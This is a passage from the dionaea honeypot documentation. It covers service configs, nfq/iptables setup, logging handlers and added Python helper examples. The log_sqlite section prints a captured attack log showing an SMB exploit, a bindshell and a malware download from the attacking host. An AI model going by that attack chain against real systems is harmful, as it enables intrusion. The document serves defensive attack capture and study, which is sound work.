          process packets which got throttled (the nfaction setting of the nfq
          ihandler):

          · NF_ACCEPT (=1), which lets the packet pass the kernel; as there
            is no service listening, the connection attempt is rejected with
            a RST.

          · NF_DROP (=0), which drops the packet in the kernel; the remote
            does not get any answer to its SYN.

          I prefer NF_DROP, as port scanners such as nmap tend to limit their
          scanning speed once they notice packets get lost.
       recursive-self-connecting
          Assume some shellcode or download instruction makes dionaea

          · connect to itself on an unbound port

          · nfq intercepts the attempt

          · and spawns a service, which

          · accepts the connection as connection #1

          · creates the mirror connection for connection #1 by connecting the
            remote host (itself) on the same port, connection #2

          · accepts connection #2 as connection #3

          · creates the mirror connection for connection #3 by connecting the
            remote host (itself) on the same port, connection #4

          · …

          Such a recursive loop has to be avoided for obvious reasons.  There‐
          fore dionaea checks whether the remote host connecting to an nfq
          mirror is a local address, using getifaddrs(3), and drops local
          connections.

       So much about the known problems and workarounds …
850
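       The two guards above, the per-second sliding window and the local
       address check, as an added example (not dionaea's own code).  It
       assumes integer-second timestamps and takes the set of local addresses
       from the caller, where dionaea collects them with getifaddrs(3); the
       remote and local addresses in the demo are constructed.

```python
"""Sliding-window throttle and self-connect guard for nfq mirror services.

Added example, not dionaea's own code.  Models the two checks described in
the nfq section: per-second slots summed over throttle.window seconds and
compared against throttle.limits.total / throttle.limits.slot, and the
"is the peer one of my own addresses?" test that breaks the recursive
self-connect loop.  Assumptions: timestamps are integer seconds and the set
of local addresses is supplied by the caller (dionaea uses getifaddrs(3)).
"""
import ipaddress
from collections import deque

NF_DROP = 0    # verdict for throttled SYNs: dropped in the kernel, no answer
NF_ACCEPT = 1  # verdict for throttled SYNs: passed on, kernel answers with RST


class NfqThrottle:
    def __init__(self, window=30, total=30, slot=30,
                 nfaction=NF_DROP, local_addresses=()):
        self.window = window          # throttle.window (seconds)
        self.total = total            # throttle.limits.total
        self.slot = slot              # throttle.limits.slot
        self.nfaction = nfaction      # nfq.nfaction (0 = DROP)
        self.local = {ipaddress.ip_address(a) for a in local_addresses}
        self.slots = deque()          # (second, accepted count), oldest first

    def _expire(self, now):
        """Forget slots that fell out of the window (now - window, now]."""
        while self.slots and self.slots[0][0] <= now - self.window:
            self.slots.popleft()

    def is_local(self, remote_ip):
        """Guard against dionaea mirroring a connection it made to itself."""
        addr = ipaddress.ip_address(remote_ip)
        return addr.is_loopback or addr in self.local

    def may_spawn(self, remote_ip, now):
        """Decide whether a mirror service is created for an intercepted SYN."""
        if self.is_local(remote_ip):
            return False
        self._expire(now)
        if sum(count for _, count in self.slots) >= self.total:
            return False                       # whole window exhausted
        if self.slots and self.slots[-1][0] == now:
            second, count = self.slots[-1]
            if count >= self.slot:
                return False                   # this second exhausted
            self.slots[-1] = (second, count + 1)
        else:
            self.slots.append((now, 1))
        return True

    def verdict(self, remote_ip, now):
        """Verdict handed back to nfqueue: NF_ACCEPT once a service exists,
        otherwise the configured nfaction."""
        return NF_ACCEPT if self.may_spawn(remote_ip, now) else self.nfaction


def simulate_scan(throttle, remote_ip, now, ports):
    """How many of the SYNs for `ports`, all arriving at second `now`,
    get a mirror service."""
    return sum(throttle.may_spawn(remote_ip, now) for _ in ports)


if __name__ == "__main__":
    # constructed addresses: one local interface address, one scanner
    t = NfqThrottle(local_addresses=["198.51.100.7"])
    print("services spawned for a 1000 port scan:",
          simulate_scan(t, "203.0.113.5", 0, range(1000)))
    print("verdict for the next SYN:", t.verdict("203.0.113.5", 0))
```

       With the defaults from the nfq example config (window 30, total 30,
       slot 30) a full port scan yields 30 mirror services, and every further
       SYN in the same 30 second window gets the nfaction verdict; the
       loopback and own-address checks answer before any slot is consumed.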
       If you read that far, you want to use it despite the techni‐
       cal/legal/ethical problems.  So … You'll need iptables, and you'll have
       to tell iptables to enqueue packets which would establish a new connec‐
       tion.  I recommend something like this:

          iptables -t mangle -A PREROUTING -i eth0 -p tcp -m socket -j ACCEPT
          iptables -t mangle -A PREROUTING -i eth0 -p tcp --syn -m state --state NEW -j NFQUEUE --queue-num 5

       Explanation:

          1. ACCEPT all connections to existing services (the socket match
             succeeds if a local socket already listens on the destination)

          2. enqueue all other new connections to the NFQUEUE

       If you have dionaea running on your NAT router, I recommend something
       like:

          iptables -t mangle -A PREROUTING -i ppp0 -p tcp -m socket -j ACCEPT
          iptables -t mangle -A PREROUTING -i ppp0 -p tcp --syn -m state --state NEW -j MARK --set-mark 0x1
          iptables -A INPUT -i ppp0 -m mark --mark 0x1 -j NFQUEUE --queue-num 5

       Explanation:

          1. ACCEPT all connections to existing services in mangle::PREROUTING

          2. MARK all other new connections

          3. if we see these marked packets on INPUT, queue them

       Keep the queue number the same in every rule: NFQUEUE without
       --queue-num uses queue 0, and a SYN queued to a number nobody reads is
       dropped by the kernel.

       Using something like:

          iptables -A INPUT -p tcp --tcp-flags SYN,RST,ACK,FIN SYN -j NFQUEUE --queue-num 5

       will enqueue /all/ SYN packets to the NFQUEUE; once you stop dionaea
       you will not even be able to connect to your ssh daemon.

       Even if you add an exemption for ssh like:

          iptables -A INPUT -i eth0 -p tcp --syn -m state --state NEW ! --destination-port 22 -j NFQUEUE --queue-num 5

       dionaea will try to create a new service for /every/ incoming connec‐
       tion, even if there is a service running already.  As it is easy to
       avoid this, I recommend sticking with the recommendation.  Besides the
       already mentioned throttle settings, there are various timeouts for the
       nfq mirror service in the config.  You can control how long the service
       will wait for new connections (/timeouts.server.listen/), how long the
       mirror connection may be idle (/timeouts.client.idle/) and how long it
       may exist in total (/timeouts.client.sustain/).
899
   PPTP
   Example config
       services/pptp.yaml

          - name: pptp
            config:
          # Cisco PIX
          #    firmware_revision: 4608
          #    hostname:
          #    vendor_name: Cisco Systems

          # DrayTek
          #    firmware_revision: 1
          #    hostname: Vigor
          #    vendor_name: DrayTek

          # Linux
          #    firmware_revision: 1
          #    hostname: local
          #    vendor_name: linux

          # Windows
          #    firmware_revision: 0
          #    hostname:
          #    vendor_name: Microsoft

          # MikroTik router
          #    firmware_revision: 1
          #    hostname: MikroTik
          #    vendor_name: MikroTik

   SIP (VoIP)
       This is a VoIP module for the honeypot dionaea.  The VoIP protocol used
       is SIP, since it is the de facto standard for VoIP today.  In contrast
       to some other VoIP honeypots, this module doesn't connect to an
       external VoIP registrar/server.  It simply waits for incoming SIP
       messages (e.g.  OPTIONS or even INVITE), logs all data as honeypot
       incidents and/or binary data dumps (RTP traffic), and reacts
       accordingly, for instance by creating a SIP session including an RTP
       audio channel.  As sophisticated exploits within the SIP payload are
       not very common yet, the honeypot module doesn't pass any code to
       dionaea's code emulation engine.  This will be implemented if we spot
       such malicious messages.  The main features of the VoIP module are:

       · Support for most SIP requests (OPTIONS, INVITE, ACK, CANCEL, BYE)

       · Support for multiple SIP sessions and RTP audio streams

       · Record all RTP data (optional)

       · Set custom SIP username and secret (password)

       · Set custom user agent to mimic different phone models

       · Uses dionaea's incident system to log to an SQL database

   Personalities
       A personality defines how to handle a request.  At least the 'default'
       personality MUST exist.  The following options are available per
       personality.

       serve
          A list of IP addresses to use this personality for.

       handle
          List of SIP methods to handle.

   SIP Users
       You can easily add, change or remove users by editing the SQLite file
       specified by the 'users = ""' parameter in the config file.  All users
       are specified in the users table.

       username
          Specifies the name of the user.  This value is treated as a regular
          expression.  See Python: Regular Expressions <‐
          http://docs.python.org/py3k/library/re.html> for more information.
          Note that a permissive pattern such as '.*' answers for any
          extension an attacker enumerates, which is useful for a honeypot
          but should be a deliberate choice.

       password
          The password.

       personality
          The user is only available in the personality specified by this
          value.  You can define a personality in the config file.

       pickup_delay_min
          This is an integer value.  Let the phone ring for at least this
          number of seconds.

       pickup_delay_max
          This is an integer value.  Maximum number of seconds to wait before
          dionaea picks up the phone.

       action
          This value isn't in use, yet.

       sdp
          The name of the SDP to use.  See table 'sdp'.

   SDP
       All SDPs can be defined in the sdp table in the users database.

       name
          Name of the SDP

       sdp
          The value to use as SDP

       The following values are available in the SDP definition.

       {addrtype}
          Address type. (IP4 or IP6)

       {unicast_address}
          RTP address

       {audio_port}
          Dionaea audio port.

       {video_port}
          Dionaea video port.

       The following control parameters are available in the SDP definition.

       [audio_port]…content…[/audio_port]
          The content is only available in the output if the audio_port value
          is set.

       [video_port]…content…[/video_port]
          The content is only available in the output if the video_port value
          is set.

       Example:

          v=0
          o=- 1304279835 1 IN {addrtype} {unicast_address}
          s=SIP Session
          c=IN {addrtype} {unicast_address}
          t=0 0
          [audio_port]
          m=audio {audio_port} RTP/AVP 111 0 8 9 101 120
          a=sendrecv
          a=rtpmap:111 Speex/16000/1
          a=fmtp:111 sr=16000,mode=any
          a=rtpmap:0 PCMU/8000/1
          a=rtpmap:8 PCMA/8000/1
          a=rtpmap:9 G722/8000/1
          a=rtpmap:101 telephone-event/8000
          a=fmtp:101 0-16,32,36
          a=rtpmap:120 NSE/8000
          a=fmtp:120 192-193
          [/audio_port]
          [video_port]
          m=video {video_port} RTP/AVP 34 96 97
          c=IN {addrtype} {unicast_address}
          a=rtpmap:34 H263/90000
          a=fmtp:34 QCIF=2
          a=rtpmap:96 H263-1998/90000
          a=fmtp:96 QCIF=2
          a=rtpmap:97 H263-N800/90000
          [/video_port]
1061
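       The user lookup of the SIP Users section and the SDP rendering rules
       above, as one added example that is not dionaea's own code.  The users
       and sdp tables are rebuilt in an in-memory SQLite database from just
       the columns listed in this document (the real sipaccounts.sqlite may
       carry more), the rows and the shortened SDP template are constructed,
       and whether dionaea anchors the username pattern is an assumption
       (re.match is used, so the pattern decides).

```python
"""SIP user lookup and SDP template rendering.

Added example, not dionaea's own code.  The `users` and `sdp` tables below
use only the columns named in the SIP Users / SDP sections; the sample rows
and the SDP template are constructed.  Assumption: the username regex is
applied with re.match, so a pattern needs its own anchors to be exact.
"""
import random
import re
import sqlite3
import textwrap

SCHEMA = """
CREATE TABLE users (username TEXT, password TEXT, personality TEXT,
                    pickup_delay_min INTEGER, pickup_delay_max INTEGER,
                    action TEXT, sdp TEXT);
CREATE TABLE sdp   (name TEXT, sdp TEXT);
"""

# Constructed rows: one specific extension first, then a catch-all that
# answers any username a scanner tries to enumerate.
USERS = [
    ("^10[0-9]$", "secret", "default", 2, 5, None, "default"),
    ("^.*$",      "",       "default", 5, 10, None, "default"),
]

DEFAULT_SDP = textwrap.dedent("""\
    v=0
    o=- 1304279835 1 IN {addrtype} {unicast_address}
    s=SIP Session
    c=IN {addrtype} {unicast_address}
    t=0 0
    [audio_port]
    m=audio {audio_port} RTP/AVP 0 8 101
    a=sendrecv
    a=rtpmap:0 PCMU/8000/1
    a=rtpmap:8 PCMA/8000/1
    a=rtpmap:101 telephone-event/8000
    [/audio_port]
    [video_port]
    m=video {video_port} RTP/AVP 34
    c=IN {addrtype} {unicast_address}
    a=rtpmap:34 H263/90000
    [/video_port]
    """)


def open_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    db.executemany("INSERT INTO users VALUES (?,?,?,?,?,?,?)", USERS)
    db.execute("INSERT INTO sdp VALUES (?,?)", ("default", DEFAULT_SDP))
    return db


def find_user(db, username, personality="default"):
    """First users row (table order) whose regex matches the requested name,
    restricted to the personality that serves the request."""
    rows = db.execute(
        "SELECT username, password, pickup_delay_min, pickup_delay_max, sdp "
        "FROM users WHERE personality = ? ORDER BY rowid", (personality,))
    for pattern, password, dmin, dmax, sdp in rows:
        if re.match(pattern, username):
            return {"password": password, "pickup_delay": (dmin, dmax), "sdp": sdp}
    return None


def pickup_delay(user, rng=random):
    """Seconds to let the phone ring, between the user's min and max."""
    dmin, dmax = user["pickup_delay"]
    return rng.randint(dmin, dmax)


# [audio_port] / [video_port] blocks on lines of their own, as in the example
_BLOCK = re.compile(r"\[(audio_port|video_port)\]\n(.*?)\[/\1\]\n", re.S)


def render_sdp(template, addrtype, unicast_address, audio_port=None, video_port=None):
    """Drop [x]...[/x] blocks whose port is unset, then fill the placeholders."""
    values = {"addrtype": addrtype, "unicast_address": unicast_address,
              "audio_port": audio_port, "video_port": video_port}
    body = _BLOCK.sub(lambda m: m.group(2) if values[m.group(1)] is not None else "",
                      template)
    return body.format(**values)


def sdp_for_user(db, user, addrtype, unicast_address, audio_port=None, video_port=None):
    """Look up the user's SDP by name in the sdp table and render it."""
    (template,) = db.execute("SELECT sdp FROM sdp WHERE name = ?",
                             (user["sdp"],)).fetchone()
    return render_sdp(template, addrtype, unicast_address, audio_port, video_port)
```

       Rendering with only audio_port set yields an SDP without any m=video
       line and without the control markers; with both ports set the video
       block appears, including its own c= line.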
   Example config
       services/sip.yaml

          - name: sip
            config:
              udp_ports:
                - 5060
              tcp_ports:
                - 5060
              tls_ports:
                - 5061
              users: "@LOCALESTATEDIR@/lib/dionaea/sipaccounts.sqlite"
              rtp:
                enable: true
                # how to dump the rtp stream
                # bistream = dump as bistream
                modes:
                  - bistream
                  - pcap
                pcap:
                  path: "var/dionaea/rtp/{personality}/%Y-%m-%d/"
                  filename: "%H:%M:%S_{remote_host}_{remote_port}_in.pcap"
              personalities:
                default:
                  domain: "localhost"
                  name: "softphone"
                  personality: "generic"
          #      next-server:
          #        domain: "my-domain"
          #        name: "my server"
          #        personality: "generic"
          #        serve: ["10.0.0.1"]
          #        default_sdp: "default"
          #        handle: ["REGISTER", "INVITE", "BYE", "CANCEL", "ACK"]

              actions:
                bank-redirect:
                  do: "redirect"
                  params:
                play-hello:
                  do: "play"
                  params:
                    file: "var/dionaea/.../file.ext"


   SMB
       The main protocol offered by dionaea is SMB.  SMB has a decent history
       of remotely exploitable bugs and is a very popular target for worms.
       dionaea's SMB implementation makes use of a python3 adapted version of
       scapy.  As scapy's own version of SMB was pretty limited, almost
       everything but the Field declarations had to be rewritten.  The SMB
       emulation written for dionaea is used by the mwcollectd <‐
       http://code.mwcollect.org> low interaction honeypot too.  Besides the
       known attacks on SMB, dionaea supports uploading files to smb shares.
       Adding new DCE remote procedure calls is a good start to get into
       dionaea code; you can use:

          SELECT
                  COUNT(*),
                  dcerpcrequests.dcerpcrequest_uuid,
                  dcerpcservice_name,
                  dcerpcrequest_opnum
          FROM
                  dcerpcrequests
                  JOIN dcerpcservices ON(dcerpcrequests.dcerpcrequest_uuid == dcerpcservices.dcerpcservice_uuid)
                  LEFT OUTER JOIN dcerpcserviceops ON(dcerpcserviceops.dcerpcserviceop_opnum = dcerpcrequest_opnum AND dcerpcservices.dcerpcservice = dcerpcserviceops.dcerpcservice )
          WHERE
                  dcerpcserviceop_name IS NULL
          GROUP BY
                  dcerpcrequests.dcerpcrequest_uuid,dcerpcservice_name,dcerpcrequest_opnum
          ORDER BY
                  COUNT(*) DESC;

       to identify potentially useful targets among the unknown dcerpc calls,
       using the data you gathered and stored in your log_sqlite database
       (the requested opnums that have no implemented operation on the
       matching service).  Patches are appreciated.
1138
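       The query above run against a constructed subset of the log_sqlite
       schema, as an added example (not dionaea's own code).  Only the columns
       the query names are created; the service, its opnums and the uuid are
       constructed.

```python
"""Find DCERPC opnums attackers request that the honeypot does not implement.

Added example, not dionaea's own code.  The three tables carry only the
columns the query in the SMB section refers to; the real log_sqlite schema
has more.  Service name, uuid and opnums are constructed.
"""
import sqlite3

SCHEMA = """
CREATE TABLE dcerpcservices   (dcerpcservice INTEGER PRIMARY KEY,
                               dcerpcservice_uuid TEXT, dcerpcservice_name TEXT);
CREATE TABLE dcerpcserviceops (dcerpcservice INTEGER, dcerpcserviceop_opnum INTEGER,
                               dcerpcserviceop_name TEXT);
CREATE TABLE dcerpcrequests   (dcerpcrequest_uuid TEXT, dcerpcrequest_opnum INTEGER);
"""

# the query from the SMB section, unchanged
UNKNOWN_OPS_QUERY = """
SELECT
        COUNT(*),
        dcerpcrequests.dcerpcrequest_uuid,
        dcerpcservice_name,
        dcerpcrequest_opnum
FROM
        dcerpcrequests
        JOIN dcerpcservices ON(dcerpcrequests.dcerpcrequest_uuid == dcerpcservices.dcerpcservice_uuid)
        LEFT OUTER JOIN dcerpcserviceops ON(dcerpcserviceops.dcerpcserviceop_opnum = dcerpcrequest_opnum AND dcerpcservices.dcerpcservice = dcerpcserviceops.dcerpcservice )
WHERE
        dcerpcserviceop_name IS NULL
GROUP BY
        dcerpcrequests.dcerpcrequest_uuid,dcerpcservice_name,dcerpcrequest_opnum
ORDER BY
        COUNT(*) DESC;
"""

# constructed identifiers, not real interface UUIDs
SERVICE_UUID = "11111111-2222-3333-4444-555555555555"
FOREIGN_UUID = "99999999-8888-7777-6666-555555555555"


def build_sample_db():
    """One service with opnums 0 and 1 implemented; attackers call opnum 9
    three times, opnum 7 once, opnum 1 once, plus one request for a uuid
    dionaea has no service record for."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    db.execute("INSERT INTO dcerpcservices VALUES (1, ?, 'sample_svc')", (SERVICE_UUID,))
    db.executemany("INSERT INTO dcerpcserviceops VALUES (1, ?, ?)",
                   [(0, "Op0"), (1, "Op1")])
    db.executemany("INSERT INTO dcerpcrequests VALUES (?, ?)",
                   [(SERVICE_UUID, 9)] * 3 + [(SERVICE_UUID, 7), (SERVICE_UUID, 1),
                                              (FOREIGN_UUID, 3)])
    return db


def unknown_opnums(db):
    """(count, uuid, service name, opnum) rows, most requested first."""
    return db.execute(UNKNOWN_OPS_QUERY).fetchall()


if __name__ == "__main__":
    for count, uuid, name, opnum in unknown_opnums(build_sample_db()):
        print(f"{count:4d}  {name}  {uuid}  opnum {opnum}")
```

       Opnum 1 is filtered out because the LEFT OUTER JOIN finds its
       implementation; opnums 9 and 7 surface, ordered by how often they were
       requested.  Note the inner JOIN on dcerpcservices: requests for a uuid
       dionaea has no service entry for never appear in this result, so a
       second query on dcerpcrequests alone is needed to spot those.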
   Example config
       services/smb.yaml

          - name: smb
            config:

              ## Generic setting ##

              # 1:"Windows XP Service Pack 0/1",
              # 2:"Windows XP Service Pack 2",
              # 3:"Windows XP Service Pack 3",
              # 4:"Windows 7 Service Pack 1",
              # 5:"Linux Samba 4.3.11"
          #    os_type: 2

               # Additional config
          #    primary_domain: Test
          #    oem_domain_name: Test
          #    server_name: TEST-SERVER

               ## Windows 7 ##
          #    native_os: Windows 7 Professional 7600
          #    native_lan_manager: Windows 7 Professional 6.1
          #    shares:
          #      ADMIN$:
          #        comment: Remote Admin
          #        path: C:\\Windows
          #        type: disktree
          #      C$:
          #        comment: Default Share
          #        path: C:\\
          #        type:
          #          - disktree
          #          - special
          #      IPC$:
          #        comment: Remote IPC
          #        type: ipc
          #      Printer:
          #        comment: Microsoft XPS Document Writer
          #        type: printq

               ## Samba ##
          #    native_os: Windows 6.1
          #    native_lan_manager: Samba 4.3.11
          #    shares:
          #      admin:
          #        comment: Remote Admin
          #        path: \\home\\admin
          #        type: disktree
          #      share:
          #        comment: Default Share
          #        path: \\share
          #        type: disktree
          #      IPC$:
          #        comment: Remote IPC
          #        path: IPC Service
          #        type: ipc
          #      Printer:
          #        comment: Printer Drivers
          #        type: printq


   TFTP
       Written to test the udp connection code, dionaea provides a tftp server
       on port 69, which can serve files.  Even though there were vulnerabili‐
       ties in tftp services, I'm yet to see an automated attack on tftp ser‐
       vices.

   Example config
       services/tftp.yaml

          - name: tftp
            config:
              root: /var/lib/dionaea/roots/tftp


   UPnP
   Example config
       services/upnp.yaml

          - name: upnp
            config:
              root: /var/lib/dionaea/roots/upnp
              # maximum size in kbytes of the request (32MB)
              max_request_size: 32768
              personality:
                # default
                cache:    "CACHE-CONTROL: max-age=120\r\n"
                st:       "ST: upnp:rootdevice\r\n"
                usn:      "USN: uuid:Upnp-IPMI-1_0-1234567890001::upnp:rootdevice\r\n"
                server:   "SERVER: Linux/2.6.17.WB_WPCM450.1.3 UPnP/1.0, Intel SDK for UPnP devices/1.3.1\r\n"
                location: "LOCATION: http://192.168.0.1:49152/IPMIdevicedesc.xml\r\n"
                opt:      "OPT: http://schemas.upnp.org/upnp/1/0/\r\n"
          #      # Samsung TV
          #      cache:     "CACHE-CONTROL: max-age=900\r\n"
          #      st:        "ST: uuid:c1fd12b2-d954-4dba-9e92-a697e1558fb4\r\n"
          #      usn:       "USN: uuid:c1fd12b2-d954-4dba-9e92-a697e1558fb4\r\n"
          #      server:    "SERVER: SHP, UPnP/1.0, Samsung UPnP SDK/1.0\r\n"
          #      location:  "LOCATION: http://192.168.0.10:7677/MainTVServer2\r\n"
          #      opt:       "OPT: http://schemas.upnp.org/upnp/1/0/\r\n"
          #
          #      # XBOX 360
          #      cache:     "CACHE-CONTROL: max-age=1800\r\n"
          #      st:        "ST: urn:microsoft.com:service:X_MS_MediaReceiverRegistrar:1\r\n"
          #      usn:       "USN: uuid:531c567a-8c46-4201-bcd4-09afa554d859::urn:microsoft.com:service:X_MS_MediaReceiverRegistrar:1\r\n"
          #      server:    "SERVER: Microsoft-Windows/6.3 UPnP/1.0 UPnP-Device-Host/1.0\r\n"
          #      location:  "LOCATION: http://192.168.0.10:1055/upnphost/udhisapi.dll?content=uuid:531c567a-8c46-4201-bcd4-09afa554d859\r\n"
          #      opt:       "OPT: http://schemas.upnp.org/upnp/1/0/\r\n"



LOGGING (IHANDLER)

       Getting a copy of the malware is cool, getting an overview of the
       attacks run on your sensor is priceless.

       dionaea can write information to a text file, but be aware, dionaea's
       logging to text files is rather chatty, really chatty, and you do not
       want to look at that information unless you are debugging the software
       or writing some new feature for it.

       Of course, you can apply filters to the logging, to limit it to
       different facilities or levels, but in general you do not want to work
       with text files.

       dionaea uses an internal communication system called incidents.  An
       incident has an origin, which is a string, a path, and properties,
       which can be integers, strings, or a pointer to a connection.
       Incidents carry only what is needed: they pass the information
       required to incident handlers (ihandler).  An ihandler can register a
       path for the incidents it wants to be informed about; the paths are
       matched in a glob like fashion.  Therefore logging information using an
       ihandler is superior to text logging: you get the information you are
       looking for, and can write it to a format you choose yourself.

       List of available ihandlers
1273
   emuprofile
   Example config
       ihandlers/emuprofile.yaml

          - name: emuprofile


   fail2ban
   Example config
       ihandlers/fail2ban.yaml

          - name: fail2ban
            config:
              downloads: "/var/lib/dionaea/downloads.f2b"
              offers: "/var/lib/dionaea/offers.f2b"


   ftp
   Example config
       ihandlers/ftp.yaml

          # ftp client section
          - name: ftp
            config:
              # host for active ftp via NAT
              # * 0.0.0.0 - the initiating connection ip is used for active ftp
              # * not 0.0.0.0 - gets resolved as hostname and used
              active_host: "0.0.0.0"

              # ports for active ftp; string indicating a range
              active_ports: 63001-64000


   hpfeeds
   Example config
       ihandlers/hpfeeds.yaml

          - name: hpfeeds
            config:
              server: "hpfriends.honeycloud.net"
              port: 10000
              ident: ""
              secret: ""
              # dynip_resolve: enable to lookup the sensor ip through a webservice
              dynip_resolve: "http://hpfriends.honeycloud.net/ip"


   log_db_sql
       WARNING:
          This ihandler is experimental.

       This incident handler can write interesting information about attacks
       and connections into an SQL database.  It uses SQLAlchemy to support
       different databases.

   Example config
       ihandlers/log_db_sql.yaml

          - name: log_db_sql
            config:
              url: sqlite:////var/lib/dionaea/dionaea.db


   log_incident
       This ihandler can be used to export incidents in realtime to be
       processed by external programs.

       WARNING:
          This ihandler is in pre alpha state and it might be changed or
          removed in the future.

   Configure
       handlers
          List of URLs to submit the information to.  At the moment only file,
          http and https are supported.

   Format
          {
             "name": "<sensor-name>",
             "origin": "<name of the incident>",
             "timestamp": "<date in ISO 8601>",
             "data": {
                "connection": {
                   "id": <internal ID>,
                   "local_ip": "<local IP>",
                   "local_port": <local port>,
                   "remote_ip": "<remote IP>",
                   "remote_hostname": "<remote hostname if resolvable>",
                   "remote_port": <remote port>,
                   "protocol": "<protocol>",
                   "transport": "<transport tcp|udp>"
                }
             }
          }

   Example config
       ihandlers/log_incident.yaml

          - name: log_incident
            config:
              handlers:
                #- http://127.0.0.1:8080/
                - file:///var/lib/dionaea/dionaea_incident.json
1377
1378
   log_json
       This ihandler can submit information about attacks/connections encoded
       as json.

       WARNING:
          This ihandler is in pre alpha state and it might be changed or
          removed in the near future.

   Configure
       flat_data
          Set to true to flatten object lists.

       handlers
          List of URLs to submit the information to.  At the moment only file,
          http and https are supported.

   Format
       Format of the connection information:

          {
              "connection": {
                  "local": {
                      "address": "<string:local ip address>",
                      "port": <integer:local port>,
                  },
                  "protocol": "<string:service name e.g. httpd>",
                  "remote": {
                      "address": "<string:remote ip address>",
                      "port": <integer:remote port>,
                      "hostname": "<string:hostname of the remote host>"
                  },
                  "transport": "<string:transport protocol e.g. tcp or udp>",
                  "type": "<string:connection type e.g. accepted, listen, ...>"
              }
          }

   Example config
       ihandlers/log_json.yaml

          - name: log_json
            config:
              # Uncomment next line to flatten object lists to work with ELK
              # flat_data: true
              handlers:
                #- http://127.0.0.1:8080/
                - file:///var/lib/dionaea/dionaea.json


   log_sqlite
       WARNING:
          This ihandler was renamed in dionaea 0.4.0 from logsql to
          log_sqlite.

       This is what the logsql python script does: it is an ihandler and
       writes interesting incidents to a sqlite database.  One of the benefits
       of this logging is the ability to cluster incidents based on the
       initial attack when retrieving the data from the database:

          connection 610 smbd tcp accept 10.69.53.52:445 <- 10.65.34.231:2010
           dcerpc request: uuid '3919286a-b10c-11d0-9ba8-00c04fd92ef5' opnum 9
           p0f: genre:'Windows' detail:'XP SP1+, 2000 SP3' uptime:'-1' tos:'' dist:'11' nat:'0' fw:'0'
           profile: [{'return': '0x7c802367', 'args': ['', 'CreateProcessA'], 'call': 'GetProcAddress'},
                      ...., {'return': '0', 'args': ['0'], 'call': 'ExitThread'}]
           service: bindshell://1957
           connection 611 remoteshell tcp listen 10.69.53.52:1957
             connection 612 remoteshell tcp accept 10.69.53.52:1957 <- 10.65.34.231:2135
               p0f: genre:'Windows' detail:'XP SP1+, 2000 SP3' uptime:'-1' tos:'' dist:'11' nat:'0' fw:'0'
               offer: fxp://1:1@10.65.34.231:8218/ssms.exe
               download: 1d419d615dbe5a238bbaa569b3829a23 fxp://1:1@10.65.34.231:8218/ssms.exe
               connection 613 ftpctrl tcp connect 10.69.53.52:37065 -> 10.65.34.231/None:8218
                 connection 614 ftpdata tcp listen 10.69.53.52:62087
                   connection 615 ftpdata tcp accept 10.69.53.52:62087 <- 10.65.34.231:2308
                     p0f: genre:'Windows' detail:'XP SP1+, 2000 SP3' uptime:'-1' tos:'' dist:'11' nat:'0' fw:'0'

       The tree reads top down: the SMB connection carries the DCERPC request
       and the emulated shellcode profile, the shellcode opened a bindshell,
       the shell session received the download offer, and the FTP control and
       data connections are children of that shell session.

       Additionally, you can query the database for many different things;
       refer to:

       · dionaea sql logging 2009/11/06

       · post it yourself 2009/12/08

       · sqlite performance 2009/12/12

       · virustotal fun 2009/12/14

       · Andrew Waite's Blog for mimic-nepstats.py

       for more examples of how to make use of the database.

   Example config
       ihandlers/log_sqlite.yaml

          - name: log_sqlite
            config:
              file: /var/lib/dionaea/dionaea.sqlite


   nfq
   Example config
       ihandlers/nfq.yaml

          - name: nfq
            # nfq can intercept incoming tcp connections during the tcp handshake
            # giving your honeypot the possibility to provide service on
            # ports which are not served by default.
            # refer to the documentation BEFORE using this
            config:
              # 0 = DROP
              nfaction: 0
              throttle:
                window : 30
                limits:
                  total: 30
                  slot: 30
              timeouts:
                server:
                    listen: 5
                client:
                  idle: 10
                  sustain: 240


   p0f
   Example config
       ihandlers/p0f.yaml

          - name: p0f
            config:
              # start p0f with
              # sudo p0f -i any -u root -Q /tmp/p0f.sock -q -l
              path: "un:///tmp/p0f.sock"


   store
   Example config
       ihandlers/store.yaml

          - name: store


   submit_http
   Example config
       ihandlers/submit_http.yaml

          - name: submit_http
            config:
                # the url to send the submission requests to
                url: "http://example.org/"
                # E-Mail (optional)
                # email: ""
                # username (optional)
                # user:
                # password (optional)
                # pass:


   submit_http_post
   Example config
       ihandlers/submit_http_post.yaml

          - name: submit_http_post
            config:
              submit:
                file_upload:
                  urls:
                    - http://example.org/upload
                    - http://example.com/file.php
                  field_values:
                    submit: "Upload file"
                  file_fieldname: upload_file


   tftp_download
   Example config
       ihandlers/tftp_download.yaml

          - name: tftp_download


   VirusTotal
       This ihandler submits the captured malware samples to the VirusTotal
       service for further analysis.

   Configuration
       apikey
          The VirusTotal API-Key.

       file
          SQLite database file used to cache the results.

   Example config
       ihandlers/virustotal.yaml

          - name: virustotal
            config:
              # grab it from your virustotal account at My account -> Inbox -> Public API
              apikey: "........."
              file: "/var/lib/dionaea/vtcache.sqlite"



PROCESSORS

       Processors control the actions done on the bi-directional streams we
       gain when getting attacked; the default is running the emu processor on
       them to detect shellcode.

   Emu
       Use libemu to find and emulate shellcodes.

   Configuration
   Filter
       Only continue with the processing pipeline if all conditions match.

   Configuration
       protocols
          Comma separated list of protocols, i.e. the service names a
          connection reports (e.g. smbd or httpd).

       types
          Comma separated list of connection types.

          · accept - dionaea accepts a new connection from a remote host

          · connect - dionaea makes a connection to a remote host

   Streamdumper
       This processor can dump a connection as a bi-directional stream.  The
       dump can be used to replay an attack on ip-level without messing with
       pcap and tcpreplay.

   Configuration
       path
          Dumps will be created in this directory.


CONTRIBUTING

       First of all, thank you for your interest in contributing to dionaea!

   Filing bug reports
       Bug reports are very welcome.  Please file them on the GitHub issue
       tracker.  Good bug reports come with extensive descriptions of the
       error and how to reproduce it.

   Patches
       All patches to dionaea should be submitted in the form of pull requests
       to the main dionaea repository, DinoTools/dionaea.  These pull requests
       should satisfy the following properties:

   Code
       · The pull request should focus on one particular improvement to
         dionaea.

       · Create different pull requests for unrelated features or bugfixes.

       · Python code should follow PEP 8, especially in the "do what code
         around you does" sense.

   Documentation
       When introducing new functionality, please remember to write
       documentation.

   Review
       Finally, pull requests must be reviewed before merging.  Everyone can
       perform reviews; this is a very valuable way to contribute, and is
       highly encouraged.


DEVELOPMENT

1644       dionaea initial development was funded by the Honeynet Project as  part
1645       of  the  Honeynets Summer of Code during 2009.  The development process
1646       is as open as possible.  You can browse the source  online  and  report
1647       bugs on GitHub.
1648
1649   Development
